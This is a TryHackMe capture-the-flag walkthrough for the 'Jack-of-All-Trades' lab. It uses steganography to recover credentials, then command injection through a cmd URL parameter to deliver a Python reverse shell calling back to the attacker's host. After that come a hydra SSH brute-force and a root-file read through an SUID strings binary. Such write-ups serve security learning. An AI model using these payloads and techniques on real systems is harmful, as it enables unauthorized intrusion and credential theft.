Jack-of-All-Trades — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Jack-of-All-Trades — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -p- <ip>

nmap

Well there is something tricky here. Normally port 22 is for ssh, and port 80 is for http. But in this machine, it’s vice-versa.

So let’s access its website at port 22. Firefox will first block your request for security, cause it’s not the normal web server port. You can follow these steps to enable port 22 on Firefox:

1/ Type about:config in your address bar

2/ Right click -> New -> String

3/ Enter this name: network.security.ports.banned.override

4/ Enter port 22 and save

You will have the setting like this:

From now on, you can override any blocked port by modify this string to the port you want to access.

Now let’s get back to the website.

website

It’s always useful to check the page source. Press Ctrl+U to view page source.

Page source

Well you can see there are 4 things to focus on: 3 images, a hidden dir, and a encoded string.

First let’s see what’s inside the hidden folder: /recovery.php

recovery.php

Well it’s a login page. I guess the username is jack and the password is the encoded string above. Let’s use icyberchef.com to decode that string.

cyberchef

So it’s encoded with Base64. Now I have the password: u?WtKSraq

I tried to login with jack and the password, but it didn’t work. So let’s find another way.

It’s time for some stego. Download those 3 images and look for hidden data.

I will use steghide to extract hidden data

steghide extract -sf stego.jpg

Enter the password above and you will see the hidden data.

I cannot extract hidden data inside jackinthebox.jpg with that password so just skip it. Let’s see what’s inside the “creds.txt”.

creds.txt

Uh-oh!! 😣 That means we need to extract data inside another image.

There is only 1 image left, which is header.jpg.

steghide extract -sf header.jpg

Also use the password above.

header.jpg

Read the content of this hidden data.

cms.creds

Finally we have the credential! Let’s login to /recovery.php page.

Login

It told us to give it a ‘cmd’, which means we use command injection.

First let’s try ls to list file inside home folder. Add ?cmd=ls+/home to the end of the url.

ls

Well it worked. So let’s spawn a reverse shell.

Start a listener on your machine.

nc -lvnp 4444

Change the cmd:

?cmd=python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“your_host_ip”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

*Remember to change your_host_ip to your ip.

Now you have the shell on your machine.

shell

cd to home folder and cat content of jacks_password_list

jacks_password_list

It’s a password list for user jack to access ssh. Let’s bruteforce that using hydra. Copy the pass list to a txt file.

hydra -l jack -P jack.txt ssh://<ip>:80

*I named the file jack.txt. So remember to change it to your file’s name.

Hydra

Now I’ve found the valid password. Let’s SSH to the machine.

ssh jack@10.10.182.221 -p 80

Enter the password and we’re in!

ssh

Now cd to jack’s home and list file.

jack’s home

There is a user.jpg inside, and it will be our first flag. Get this image to your machine using scp

scp -P 80 jack@<machine_ip>:/home/jack/user.jpg /your_home_folder

Enter jack’s password and the picture will be transfer to your machine.

user.jpg

Open the image and get your first flag.

1st flag

Now let’s get root to get the final flag inside /root folder.

First try sudo -l to see if Jack can run sudo on this machine.

sudo -l

Unfortunately, no! So let’s try another way. Use find to search for command with special SUID bit set.

find / -perm -u=s 2>/dev/null

find

Well there is strings command. We can use this to cat the /root/root.txt

First declare LFILE=/root/root.txt

Then exec:

strings “$LFILE”

strings

Now get your final flag!

The end.

HAPPY HACKING

I’m Groot